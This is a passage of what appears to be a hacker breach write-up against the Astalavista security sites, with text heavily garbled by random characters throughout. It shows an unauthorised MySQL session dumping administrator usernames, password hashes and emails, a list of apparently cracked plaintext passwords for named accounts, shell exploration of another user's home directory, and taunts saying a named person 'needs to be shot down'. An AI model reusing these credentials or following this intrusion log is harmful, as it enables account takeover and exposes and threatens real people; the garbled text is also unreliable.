' B# a; ?- a; \0 \6 V <language>en-us</language># K% P: U5 j0 I& t) x% r
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>9 V$ \4 u1 E/ g+ m" Y( T7 M
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
. ^$ c3 z/ W4 P, n' C <generator>Astalavista.com</generator>
$ H- `( O" U/ o& n9 A <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
: q1 V N; X# b8 q </channel>( X6 `" }/ ?1 U; U% t2 B0 E
</rss>’;
' `4 g3 C/ u8 D3 i3 \8 D! a7 F/ }7 j( O; l1 I" L6 \; z/ j% ^
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
4 N" f8 y7 g$ {+ v, I/ {$ E unlink (FULLPATH . ‘/feed/exploits.xml’);, }4 M, w. ]; |, G+ U% N
}
6 X# M0 N2 e$ J1 u$ Q$ x4 p
$ w X7 L7 f7 `: r: `/ w+ j file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
8 y5 V G' t* h" E# s3 J4 g0 D7 h2 T[snip]1 F$ s f2 [" P9 e( X
: ^( A' f+ a/ C" R# z( f: S
sh-3.2$ cat exploits.sh
0 R; m' N$ x6 i0 D" A#!/bin/sh
( }+ v1 R' @# \9 I& T" |' A' `; a% _
###########################################################0 [, x( Z+ O% s* Z/ O6 ^8 `! g! ^
# #
, k1 Y8 H/ `, H- }# Title: milw0rm exploits adder #3 Z/ D8 w6 d0 q/ \' h* c& Q
# Description: Add all milw0rm exploits to the #
4 ~! N" T4 E, Z$ G; d5 `# Astalavista.com database #9 @" P# X3 ^0 D! M6 V5 |
# #
" j( v8 O5 x! j% [5 T( _# Company: Astalavista Group #
7 h- \/ C* W0 | Y# Author: Paulo M. Santos #4 ]. u: y$ p- K4 z3 E$ k, i
# E-Mail: 链接标记paulo.santos@astalavista.ch #0 P7 J5 R e$ z _ `1 h6 U1 P- _
# #/ O$ ?# M" h; _& x
###########################################################
0 W [8 T" v) b/ H6 f! [) q
" x1 G1 j* L) m+ o+ e! N# path
5 C3 ?1 `4 Q' k6 b }this_path=/home/com/public_html/modifications/cronjobs7 ?* T5 u t o6 p
8 p% C& \) `. S" g
# change directory
7 b7 Z3 g: i f' b( ycd $this_path- |5 L! ?- S1 A" o
cd tmp/
8 L$ d* p& D1 {5 a* H- ~4 M4 ^6 q
# delete files
5 I* |& f/ I+ `! f* T2 ]+ `" Orm -rf milw0rm.tar.* &- a$ N" i8 w4 s+ o
rm -rf milw0rm/ &1 S' x% w% b+ p& Y/ a
9 ?1 o$ B. _2 U3 G6 X7 r/ L7 m
# wget milw0rm paket
% v3 {& D' F7 D6 n2 Jwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]/ W4 D! O+ k7 t5 F2 t
5 U, Z, q6 ] E8 Q- F' G# extract milw0rm paket6 L- B( R8 @' f: S. @
tar -xvf milw0rm.tar.bz2
8 r) c& t& m: F- p4 b& m/ _% T P5 m7 F# \, h( i
# change owner7 h. r+ ?% U3 E
chown -R com .
/ }& Y |( M' P, {/ fchgrp -R com .
" C- x- R8 u3 l6 o6 Z7 w9 o+ q% a5 c$ m1 ?# I$ u
# execute php script) r; D1 g# m* {" v" B
cd $this_path
+ p3 n4 H/ R3 M" i1 ~/ qphp -q exploits.php+ i9 j# a w ~# J" r' H
* y6 u! A/ D$ Z- g, [) @" F6 s# delete files. ^9 n: ^" N% W' k
rm -rf tmp/milw0rm.tar.*
# e$ R$ H: B8 V4 w8 Qrm -rf tmp/milw0rm/# ]+ T) Z5 L, F
, r! ^! e I, Z0 j' E
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”6 c6 r u9 s* q7 l1 h6 W) D
Paulo M. Santos needs to be shot down.4 Y, M- D$ N8 X- @" S
' x: q) q4 G& q/ G' s
mysql -u contrexxuser2 -p- L, H9 i ~( ^1 A. N
Enter password:
: F$ ^% @6 ^2 l9 e* W0 DWelcome to the MySQL monitor. Commands end with ; or \g.3 }# Z- D9 h' ^
Your MySQL connection id is 2616945 ?. i6 I4 t" ]9 }
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
" w( A! x% b1 @- l% ]
' l( L0 E* T2 H2 NType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.: Q/ I) @: T# D: \' [( B
( U5 V+ A+ ]6 @- S, L: W7 Y& Pmysql> show databases;4 ]: j7 o3 ?5 b- f8 B
+——————–+/ m" U5 r; Q# l+ B, }
| Database |
# J# B9 K8 k. g4 H6 Y9 Q8 q' e+——————–+
+ a9 Y+ r' s) I# S# h: R- x| information_schema |
! t J3 m. i% c; ?9 J| com_contrexx2 |3 K( Z# z" }1 F5 _3 j3 O
| com_contrexx2_live |) ~/ w( I& Q: M$ t% ^1 E
| test |
8 [7 S8 H! [4 U1 ?+——————–+
# Y6 u- r0 Q# x+ o: a4 c q5 E- M4 rows in set (0.00 sec)7 {7 H2 [4 t0 _" ]
' U: k1 Z4 X# y+ a) O0 ymysql> use com_contrexx2_live
4 U5 `! E' [+ j& R& RDatabase changed
/ O8 {2 D. }- f B. T0 z8 }mysql> show tables;
6 k+ q" X; N/ E: b& s8 {7 |1 J+————————————————–+
5 C" i; m! W6 z4 {. {1 o, a- {0 d6 K! y| Tables_in_com_contrexx2_live |
6 A' C M% k+ e- R- a1 W6 j+————————————————–+, {' V$ i2 i! ?. l9 l
| cc_banner_counter |5 }' k w% P" [
| cc_search_counter |
1 u6 R, l% m8 P9 g# V0 Q| contrexx_access_group_dynamic_ids |
" }9 Z5 i( T6 Q$ x1 i| contrexx_access_group_static_ids |: ]3 q, e u: q9 e0 Q
| contrexx_access_rel_user_group |9 P/ C) ^: B2 f( @ z' I
| contrexx_access_settings |
- w/ t( i4 Z8 N0 X+ N0 x Z| contrexx_access_user_attribute |9 h0 A$ _) g7 B# B1 k" z; A0 D7 f5 m5 g
| contrexx_access_user_attribute_name |1 p2 r$ S4 c0 V/ W8 g
| contrexx_access_user_attribute_value |
/ Z; n. ]0 g- W| contrexx_access_user_core_attribute |! h- o* g8 a% A% m+ v
| contrexx_access_user_groups |
4 W' I6 k; d [* t1 W8 || contrexx_access_user_mail |. Y6 H, M9 F- N4 T, @! ^) A
| contrexx_access_user_profile |
! c/ _/ |7 y) z: q: t9 ^| contrexx_access_user_title |
i- W$ J4 Q% |! i' s/ t1 l8 S| contrexx_access_user_validity |
3 L/ X) E' Q; `9 |1 @9 r. [2 W| contrexx_access_users |5 z7 [; Q0 J8 I6 z7 j) ^- A+ d9 S" u7 b
| contrexx_backend_areas |$ G- ~$ C* T6 P
| contrexx_backups |
- T6 s1 y' N0 @" v0 m5 ~ m" L8 k| contrexx_content |
2 r% X3 @$ u* g- g| contrexx_content_history |" P1 {- T$ H2 T+ q9 G# m4 l
| contrexx_content_logfile |
+ p) Z. h0 n% v( G: V. ^! }| contrexx_content_navigation |
. T6 q# D4 m" T! X$ _3 g' C8 x) D| contrexx_content_navigation_history |! h4 o) m0 r' h h( b
| contrexx_ids |5 w- g3 A" n, N( Y) s- b
| contrexx_languages |
Y9 {$ q0 Z9 Q* |( o% y: p& {| contrexx_lib_country |) C- M) b$ k `5 h
| contrexx_log |8 r- U+ W' u. O% Y' Z6 k
| contrexx_module_alias_source |5 f; r# o/ }- S2 t/ R. x. y
| contrexx_module_alias_target |
' z2 X0 \4 l" ~3 i9 @( p2 a( F9 J| contrexx_module_block_blocks |. j* k' b7 K, }, y+ q
| contrexx_module_block_rel_lang |9 L4 Z- Y# p3 S! h' |
| contrexx_module_block_rel_pages |4 E D U+ a8 j! ~. {9 g; T
| contrexx_module_block_settings |6 M; U+ W0 e6 J6 \) K' z
| contrexx_module_blog_categories |
4 d0 P; O" Q$ }& e3 {! _) ]) N| contrexx_module_blog_comments |+ c3 R3 V2 q: V2 d5 l! i* r
| contrexx_module_blog_message_to_category |
3 V, w' ^5 X! Z$ ]; L0 h| contrexx_module_blog_messages |
# F) Y6 `; I/ ?( P" |' u( B: h1 z" R| contrexx_module_blog_messages_lang |: g* E# d" v6 c6 f
| contrexx_module_blog_networks |
- h, [8 o a2 h& H; h% f# F| contrexx_module_blog_networks_lang |& ]5 F1 O9 f7 v" [: \
| contrexx_module_blog_settings |
* f, N- f* \5 ?) Y# o| contrexx_module_blog_votes |' p# B. e" K8 t& S3 w
| contrexx_module_calendar |
" E3 _2 `( i2 w# H- {$ g| contrexx_module_calendar_access |" k; X- o3 v, C+ t
| contrexx_module_calendar_categories |% Z7 {# G" l) o' f7 g8 @ T' c
| contrexx_module_calendar_form_data |! c! }( }; n: y/ K
| contrexx_module_calendar_form_fields |
( n: b# S2 I T3 o| contrexx_module_calendar_registrations |7 n5 G6 E9 Z6 }
| contrexx_module_calendar_settings |( ~1 |! V; ^$ E, U+ g) b
| contrexx_module_calendar_style |
) V, Z+ C% B: R' U" J| contrexx_module_contact_form |
. t; |* T$ `3 y' i- Z+ V| contrexx_module_contact_form_data |
" j- Z# `1 Z2 l: p* w9 K) g| contrexx_module_contact_form_field |
5 _; Q5 }) i& ]| contrexx_module_contact_settings |( m0 e$ A5 M+ x( f# R
| contrexx_module_data_categories |- x! a y6 ?# W3 s+ a
| contrexx_module_data_message_to_category |
& h% E0 v! p7 W| contrexx_module_data_messages |7 H9 K1 z- j& i- e5 l# Y
| contrexx_module_data_messages_lang |5 }; L! `$ y/ [
| contrexx_module_data_placeholders |
, I: ` _& ^7 [| contrexx_module_data_settings |# p- l4 O0 J, H8 o6 l7 M _, X+ a9 i3 h
| contrexx_module_directory_access |+ F- b: _6 m; O% k, a$ i! U
| contrexx_module_directory_categories |
9 F( z% F4 y- u4 @, p| contrexx_module_directory_dir |
+ }" h5 i" x/ Y# p/ p' c7 u; d| contrexx_module_directory_inputfields |, @7 r6 c- u- H$ ^2 c5 b; f
| contrexx_module_directory_levels |2 _8 ?/ y7 A: R" _6 h; W @
| contrexx_module_directory_mail |
0 Y3 V( R+ ^( t| contrexx_module_directory_rel_dir_cat |% J7 R V8 N3 u- X& ]
| contrexx_module_directory_rel_dir_level |0 I0 y8 ~+ H) b0 `7 _- x* F& B
| contrexx_module_directory_settings |( p7 S* O& s1 y' I& b/ I5 F' u4 V. f
| contrexx_module_directory_settings_google |, f) K5 i3 o/ p, E9 l
| contrexx_module_directory_vote |
. z8 v* W; c: f! E- t| contrexx_module_docsys |
; }1 Q0 _4 _. F, }) }+ r* A| contrexx_module_docsys_categories |
! Q7 P# o) I. z, |/ v0 y% Q9 Y| contrexx_module_egov_configuration |) o. B, R' ]0 |# @5 l
| contrexx_module_egov_orders |
' I. q8 R2 U1 S' D| contrexx_module_egov_product_calendar |
: o$ A2 P' u' c6 }| contrexx_module_egov_product_fields |" z; i" [2 V% Z+ x8 V, M" s8 }
| contrexx_module_egov_products |
" C* |+ o, T8 j/ B$ v d/ I5 j+ J| contrexx_module_egov_settings |
1 J* D5 l; U7 M+ r5 _1 ?1 `) t| contrexx_module_exploits |
2 {- N+ p; _( s0 H1 `| contrexx_module_exploits_categories |
# i7 K2 ]8 U, I% ]% J5 {| contrexx_module_feed_category |
: f: M2 b$ |# h& F4 F' B( z [# g' d3 a| contrexx_module_feed_news |
0 x, k+ c% M' E/ t4 ?& V5 C| contrexx_module_feed_newsml_association |
' f+ A. p. _0 J# n- \| contrexx_module_feed_newsml_categories |& C( M* X# r8 W0 Q
| contrexx_module_feed_newsml_documents |
$ F1 N( j- _ t! M s" || contrexx_module_feed_newsml_providers |
# Z" `3 h" ~4 r& d9 F! N| contrexx_module_forum_access |
# i9 f: a9 P# k2 V7 k1 Y| contrexx_module_forum_categories | R1 P' N# Q5 o. J- q+ T
| contrexx_module_forum_categories_lang |) E. X- j9 j; }7 C+ b5 E; A
| contrexx_module_forum_notification |$ M6 _) E8 T2 ]. y& I
| contrexx_module_forum_postings |4 w% c' y& A9 f* d4 y; b
| contrexx_module_forum_rating |
$ n( A$ S1 ?5 n6 v| contrexx_module_forum_settings |
) D5 G& M. |+ c: a| contrexx_module_forum_statistics |
+ Z: p: X6 g' g| contrexx_module_gallery_categories |% n2 d8 x3 G/ \- ^* j! \; C; `
| contrexx_module_gallery_comments |
) b. h" }+ b h| contrexx_module_gallery_language |8 F5 L6 U) O6 i
| contrexx_module_gallery_language_pics |; L {$ b) R! V) k6 w
| contrexx_module_gallery_pictures |8 a0 M: `$ F5 M% U2 |
| contrexx_module_gallery_settings |
* ]/ R. ]0 B+ N8 s; z7 x+ i# X6 q' Q| contrexx_module_gallery_votes |- E# K9 G% X! T. u% g4 _1 H- X* s$ y
| contrexx_module_guestbook |/ }) ^3 l8 T, R2 g% e; r
| contrexx_module_guestbook_settings |
: Q1 D- X& }# F$ q) _| contrexx_module_livecam |
8 \0 g0 E, e# q" ]' J2 {) p| contrexx_module_livecam_settings |: D* J5 v* R& w8 V) J
| contrexx_module_market |
4 j# {1 j& m- }7 k! m K/ ?& g/ U| contrexx_module_market_access |" i; @4 [( K$ g
| contrexx_module_market_categories |8 B8 v3 e H3 a' t$ X0 D+ k& a* B
| contrexx_module_market_mail |2 e8 Q( ]- x$ |5 D" b
| contrexx_module_market_paypal |
7 f, f: Z! Z, l7 L| contrexx_module_market_settings |+ n3 R1 P f. p' B4 E2 @; P; D; ~# [
| contrexx_module_market_spez_fields |
9 c- M: J; j5 J# B| contrexx_module_mediadir_access |1 F& G( g: E {) u
| contrexx_module_mediadir_categories |$ B0 [+ J# b) i9 C
| contrexx_module_mediadir_comments |
; B* w& l4 q" S% K M* b7 _| contrexx_module_mediadir_dir |* J: F" s" H9 g3 Z0 Q, q, {
| contrexx_module_mediadir_inputfields |: X9 K( r; e# b! ^0 ]
| contrexx_module_mediadir_levels |
* s4 J0 u$ c8 F| contrexx_module_mediadir_mail |8 p3 [" q) Z' a9 o2 H3 J
| contrexx_module_mediadir_rel_dir_cat |
: ^4 p4 @7 j. W7 j4 j. f* N/ }! k9 r| contrexx_module_mediadir_rel_dir_level |3 c8 ?/ c) g. m/ Y' W
| contrexx_module_mediadir_reports |& ~7 l; q- F4 Z, g8 ?! T$ I
| contrexx_module_mediadir_settings |
: f4 N" c ~7 ~/ V# m* d| contrexx_module_mediadir_settings_google |. s( x [ Z; \. n; w7 I9 a
| contrexx_module_mediadir_vote |6 m6 K. D5 r: s( c
| contrexx_module_memberdir_directories |
. I8 Z' _2 i0 q: D, q7 Y, Y| contrexx_module_memberdir_name |' a( y* K$ x* Q ~& D0 s& o: t
| contrexx_module_memberdir_settings |& m9 c$ G3 }7 Y; S" D1 R
| contrexx_module_memberdir_values |
" {# i7 E* a4 U3 i# v| contrexx_module_nettools_allowed_groups |
/ j( N. e0 A2 z: |! `( J| contrexx_module_nettools_settings |
& [- [) [8 A; n& ]| contrexx_module_news |
6 T1 W3 b g$ Y+ z- v| contrexx_module_news_access |
" @( W, @% D6 [4 e| contrexx_module_news_categories |7 z! P& B/ s' f) {" e
| contrexx_module_news_settings |
# |$ Z( W$ P5 U1 Y8 I3 i| contrexx_module_news_teaser_frame |
0 s3 |5 c- P0 _# }. z' W| contrexx_module_news_teaser_frame_templates |
) ~4 F8 t+ }2 o& a| contrexx_module_news_ticker |% c, h0 d! X/ L+ {% C- ~3 S. ~! ?
| contrexx_module_newsletter |
: y( P% S* M0 |/ R/ G| contrexx_module_newsletter_attachment |5 T `2 r9 f: S q) ~6 D, b
| contrexx_module_newsletter_category |' A/ [7 H$ I3 z! t! ]& v2 h0 ^& V- z
| contrexx_module_newsletter_confirm_mail |* p- _- O- V9 N" b# m0 D6 R* L! k5 v2 A: |
| contrexx_module_newsletter_rel_cat_news |) u7 \8 v$ |+ Z. ^
| contrexx_module_newsletter_rel_user_cat |
1 c" R& Q9 k+ d0 \, z| contrexx_module_newsletter_settings |
8 j& c( Z- \! ~$ Q2 v3 ~| contrexx_module_newsletter_template |
+ |# q- F n1 [( K; _3 @| contrexx_module_newsletter_tmp_sending |6 J! v7 o& Q2 M; D) n _* Z
| contrexx_module_newsletter_user |
9 l0 f; m4 d) h ?| contrexx_module_newsletter_user_title |
$ D% I0 p Z* ^3 r& }( t| contrexx_module_onlinetools_defaultports |* L. M. a, c: g6 Y8 o1 E
| contrexx_module_onlinetools_defaultports_back |
* E5 i X. T/ W7 U, G| contrexx_module_onlinetools_geolitecity_blocks |1 Z& B. O* U6 \& A* S
| contrexx_module_onlinetools_geolitecity_country |4 A" Q; r7 v2 A" U7 L- ]& V+ ?
| contrexx_module_onlinetools_geolitecity_location |
( t) z6 E4 Z8 L4 c' {# T) j$ N/ m0 n| contrexx_module_podcast_category |! m# W9 H6 g. q& k m- t/ ^
| contrexx_module_podcast_medium |
' [* f! V$ }: O9 R; v) v| contrexx_module_podcast_rel_category_lang |
0 t _: B+ Q! z- s: @| contrexx_module_podcast_rel_medium_category |
4 ~- s" q, E3 b& T( K) C| contrexx_module_podcast_settings |: [! q8 S4 s! L8 z
| contrexx_module_podcast_template |% F) S W" b6 z% M6 O1 a
| contrexx_module_proxydb |( f# D' d$ k% T/ M
| contrexx_module_recommend |0 F! a3 H/ l0 x3 v# e/ V' B- h
| contrexx_module_repository |* i" s- Q* X. K& L
| contrexx_module_securitynews_cats |
& l6 `+ i7 _& E2 ]! f2 s, L! H| contrexx_module_securitynews_feeds |$ j+ R; }$ b& x% h
| contrexx_module_securitynews_news |
7 O& _. K7 p$ E' b| contrexx_module_shop_categories |
( \4 P- I7 N+ _- A* }. @! ?| contrexx_module_shop_config |
* [9 T# D2 P# r w. s+ S8 S/ L| contrexx_module_shop_countries |
j/ o; n: s, C4 ?9 j Q4 J" [| contrexx_module_shop_currencies |
# y3 m1 j/ D6 L4 x5 \| contrexx_module_shop_customers |. z- C6 `: U! t# m. D1 Y
| contrexx_module_shop_importimg |3 E4 N X0 \* V4 a4 q# _
| contrexx_module_shop_lsv |7 ?0 { h$ ?. {9 G0 Y
| contrexx_module_shop_mail |
% K# d R% h$ W: r6 q+ ?| contrexx_module_shop_mail_content |
: w- ]$ q& n4 I' w! i5 [& o* E| contrexx_module_shop_manufacturer |
7 A6 E: m: _0 j, F( w y5 o| contrexx_module_shop_order_items |( ~ ]$ w% i5 B; H9 \# D
| contrexx_module_shop_order_items_attributes |6 @5 g. i( B. O( v7 R: t0 x
| contrexx_module_shop_orders |4 N9 |; H3 b" `# z
| contrexx_module_shop_payment |
9 P4 T# _9 d9 i) t| contrexx_module_shop_payment_processors |
3 e* J4 E& ]# I, b0 k. x1 F| contrexx_module_shop_pricelists |+ @( e# }% K) u( j
| contrexx_module_shop_products |
0 K3 ~: u. B# V+ p| contrexx_module_shop_products_attributes |
4 D8 J+ A1 l+ q: o& Q+ k| contrexx_module_shop_products_attributes_name |7 p" E) _' E: \0 ~3 @# O m5 J' k6 h
| contrexx_module_shop_products_attributes_value |: r$ _ O7 D/ z' Z/ K8 I6 o* W' F
| contrexx_module_shop_products_downloads |: L1 Y* D7 o8 F2 X, e3 x) n( [
| contrexx_module_shop_rel_countries |
5 `7 `- N% ~0 a U5 | n4 K| contrexx_module_shop_rel_payment |; c! w$ V V6 X! p3 E0 L0 _
| contrexx_module_shop_rel_shipment |- W$ U* e' T; i5 {& G9 \
| contrexx_module_shop_shipment_cost |* E* Q+ r2 v% e; \' d7 s, `1 u
| contrexx_module_shop_shipper |+ e6 d; z" U/ z: r
| contrexx_module_shop_vat |
2 X7 \. O3 P, F- l( @$ y {| contrexx_module_shop_zones |
! v1 z7 |1 B) u, a| contrexx_module_u2u_address_list |
; `; F Z& a9 W' M| contrexx_module_u2u_message_log |+ ?: m; k( A: }+ j. h7 B/ A
| contrexx_module_u2u_sent_messages | P6 Q* ^" Y, j! O% m1 E. Y
| contrexx_module_u2u_settings |% b; R% J+ c6 m9 T
| contrexx_module_u2u_user_log |
$ A u& q! r$ V' R/ r6 ?' N9 p/ i| contrexx_modules |
# o. Y1 a4 ~0 S% o7 y, l. W| contrexx_sessions |
) I f5 j7 O) R* G. R| contrexx_settings |
, a% ?" W2 b) h R+ I| contrexx_settings_smtp |
- F+ R% d2 S9 o+ N0 z$ j' U. i; q. E| contrexx_skins |
/ c2 Y8 _& ~9 m* Q| contrexx_stats_browser |
& U" M' k5 J9 x| contrexx_stats_colourdepth |3 Z( ~6 _; G* M" P$ Y ]! ?
| contrexx_stats_config |
V& L- D+ |5 Z2 d8 C0 x& u: y| contrexx_stats_country |+ {8 {3 p6 `% V" q( i) x- ?
| contrexx_stats_hostname |
' Z2 a* j4 R2 E" N- K' X| contrexx_stats_javascript |
( c6 z; U3 v2 ]/ O# I+ M/ L: A| contrexx_stats_operatingsystem |
8 R: B7 h! G9 C7 C: v9 R| contrexx_stats_referer |+ R4 T* ]! I0 O7 d) U
| contrexx_stats_requests |
: s @ a5 R/ `, e| contrexx_stats_requests_summary |
4 ^% p7 v0 a- i5 L| contrexx_stats_screenresolution |
7 A3 J- L! ?. P; A3 t| contrexx_stats_search | |2 w# K9 t* F
| contrexx_stats_spiders |* N4 D; @8 z3 \
| contrexx_stats_spiders_summary |
# D8 P6 k* R# S( M' _; t- P| contrexx_stats_visitors |
, J7 v# A# z$ L0 ]2 P4 G* S| contrexx_stats_visitors_summary |
7 V' b# q. [) M; j* E| contrexx_voting_additionaldata |
9 C C4 i( I7 K0 h( O| contrexx_voting_email |
9 S4 {7 M0 N3 J, a- W- B| contrexx_voting_rel_email_system |( i: @) B4 w @" K
| contrexx_voting_results |. a* m% _1 d b9 j% b+ r5 j3 U
| contrexx_voting_system |
/ ^4 D5 B$ g5 Y| foo |* P. R; s8 A9 F& n9 @6 ?
+————————————————–+
- U. w1 j( m3 G227 rows in set (0.01 sec)
" w# J6 p0 b& g/ ^4 @% {: S. T
' w9 J# h+ ~4 M% e5 C' G5 \, Omysql> select count(*) as skids from contrexx_access_users;
% _3 k: M5 p8 m% p% v% f+——-+! [9 C7 o5 I, g9 A, W+ V, f1 Z
| skids |
( l' @: m( N0 v3 J! X9 V* @+——-+
& {6 {+ n/ ~9 K x* E4 [; Z4 e$ ~| 53699 |
" Q) N& ^1 i; w# K( A1 u8 w8 W- |+——-+3 f1 k! W+ i/ j- Y1 a' t# i
1 row in set (0.00 sec)/ e' h+ Z/ w( h8 u( J7 |
3 e, g/ F) [8 E8 \" Amysql> describe contrexx_access_users;
5 }. S/ x; o" O+——————+——————————————+——+—–+————–+—————-+
0 V! p. q( i: d4 b| Field | Type | Null | Key | Default | Extra |
# H! }) H1 `( @: T) R- g% m+——————+——————————————+——+—–+————–+—————-+8 x1 U- z+ l1 J* ^7 C
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
3 N" V9 w ?6 m" W8 g| is_admin | tinyint(1) unsigned | NO | | 0 | |
' B$ B) n1 B5 W| username | varchar(40) | YES | MUL | NULL | |
7 H6 {) n% n* f* _| password | varchar(32) | YES | | NULL | |
2 Q( c! v: f7 z; y6 Z* f| regdate | int(14) unsigned | NO | | 0 | |
0 G! Q( E) `) O: j: w/ _| expiration | int(14) unsigned | NO | | 0 | |+ L' d1 E: A' X1 X
| validity | int(10) unsigned | NO | | 0 | |
6 ~8 r4 }1 q3 R" B, R| last_auth | int(14) unsigned | NO | | 0 | |
$ l0 P3 u1 H3 U- F/ f% h K| last_activity | int(14) unsigned | NO | | 0 | |
4 `; _0 j, X. _. ~% Y| email | varchar(255) | YES | | NULL | |8 z2 t( @" ?8 K3 {. g" C7 l
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |0 h* Z8 H v# A
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
) X8 O+ j0 Q/ D y8 b" q2 l2 @| backend_lang_id | int(2) unsigned | NO | | 0 | |( u) e* y/ a/ s" l& K9 u" m
| active | tinyint(1) | NO | | 0 | |
6 r2 P. X0 r* Q. s3 i$ _# Y- p| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |0 Q" }6 E) W1 ]* o5 C! l8 U( C
| restore_key | varchar(32) | NO | | | |
3 B$ ^" c- z; v2 A| restore_key_time | int(14) unsigned | NO | | 0 | |6 ]' V9 d& p4 w! i5 |- a; Y; Q7 \
| u2u_active | enum(’0′,’1′) | NO | | 1 | |
* r3 X4 R! ~5 p" K% H+——————+——————————————+——+—–+————–+—————-+' B- O% `6 L; k$ b. ~2 k9 p
18 rows in set (0.00 sec)6 L) b! I2 @( f2 K1 C! d. Q
6 [1 p( G- B# k5 M
mysql> select username,password,email from contrexx_access_users where is_admin = 1;, Y9 A$ w8 \ o8 y- R
+————+———————————-+—————————–+' A2 L2 \+ H. ^. e4 o
| username | password | email |
& O& U3 j+ z2 d- E0 Q( q+————+———————————-+—————————–+
+ w- c9 Y% f# j| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |+ U( \+ `+ A% O8 _
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
4 W Z! Q3 F1 ?; \" X| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |# W4 u/ o% P1 I5 E# c, |) r
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |1 C. ]) y3 J+ ?, O- E7 @7 h) Q
+————+———————————-+—————————–+
1 f' Q6 S; y6 N4 rows in set (0.04 sec)0 W$ \9 d5 `9 Y) @$ X1 J
4 K$ Q! o; Z0 nmysql> exit;
* Z$ v3 |/ j. X# dBye3 i4 Y/ B4 h6 ?1 m- p+ p! w$ S: \
$ t; _! f+ m) I- A# i/ \! T[~] There you go, your “team of security and IT professionals” is a joke., G) j6 L4 }7 N/ s! M: M" i0 Y
: F0 I/ \! I% @; G! I* O% |: g+——————————+9 D, l% z6 z( D
system:f82BN3+_*# c! s5 ?* Q. [
Be1er0ph0r:belerophor4astacom
/ x, N7 Y, T+ M; [1 x" eprozac:asta4cms!5 U" M* Y: b+ s0 c6 r8 j
commander:mpbdaagf6m
9 c/ s) @0 I2 Jsykadul:ak29eral3 Y# V% S% C: |; D
+——————————+6 e4 [- J3 }2 i6 a4 Y
; }/ X- P) q1 h% [) p1 |[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
/ T j( Y$ ?0 ]6 d…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.1 ^3 B& l& ?! W2 n# G
, c! P( Z( l& d2 Y/ g[~] Lets move to astalavista.net now,$ J" ]' n2 S/ p) b+ Q8 n3 o
; H! x/ B; B0 e# G: Z; {; K( b6 GFrom <链接标记[url]https://www.astalavista.net/[/url]>:
9 B8 j2 r, q8 R>> Everyone knows that the best defense is a good offense.
: P' P, `" |" r' Q% C+ Q. s! W>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
5 ?- ]# H2 E. L E>> The ASTALAVISTA hacking & security community is the largest IT security community in the world. g/ v5 K9 d& f- D4 L L A( r
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
& D5 K+ n2 h+ @" n- T2 n+ G
" K+ ~' g. k( r8 Z9 E>> Go ahead, try and hack our server . in a completely legal way! W, D* I6 J9 t* V% ^1 o
>> Learn by doing: We offer our members tricky tasks and challenges on an
& b; E% L! T7 j' E8 E8 z" ?>> ongoing basis so you can test your knowledge and abilities. You can also9 c3 Q! Y/ y2 \2 r3 M* v4 U
>> demonstrate what you.ve mastered by taking part in regular hacker contests9 V5 r1 p/ m# N6 Z: {; n( T, y0 [
>> and war games" p; g2 q8 K W' i
6 z# L0 c, `3 D. D
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
( W! b9 H/ V- D$ x( I
& B( R1 E- f. S2 |[-] Tricky task: Find home dir of astalavista.net
6 f! N7 X2 ^ N9 q# |: Y% R$ N7 d( _
4 o S' _# K. d# qsh-3.2$ ls -la ~astanet
3 A+ T- O% h# G( V4 l/ G: f9 T: @$ j) utotal 48
; q( q! x6 c8 e, e5 W, vdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 . j+ v8 Y9 Q* k& C# f+ _
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
5 _$ R1 K- `9 ^5 Idrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
/ T# ^9 h% c- ]) Z3 R-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history( [8 n O2 ~9 N4 N$ [% ~- y2 T- t7 X
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
- S0 `) Z+ q6 ?-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
) ^& J7 D" L4 {! [4 j7 s-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc! Y9 }( w# ~! Z: q
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains) v X! w# K# b; o
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
5 N0 D! p) }' }0 n, Jdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail3 _9 E! k7 ]- C P% D7 i: i! n3 P
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html4 {- ^4 g1 h% F ]' L' Q
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow+ Z) b& m) P, C$ T
$ ~/ r8 R6 w8 s7 ~' R- _8 Dsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
4 l4 C$ l: | v- J/ C' t+ {' A4 lsh-3.2$ ls -la' q" Y& S" M$ A4 A
total 200
! p) s# k5 _. h' K8 ?) b% D! pdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
( _# }1 S6 u8 N6 q2 ?drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..$ j# R; a4 ]9 I2 G [) g7 y0 a
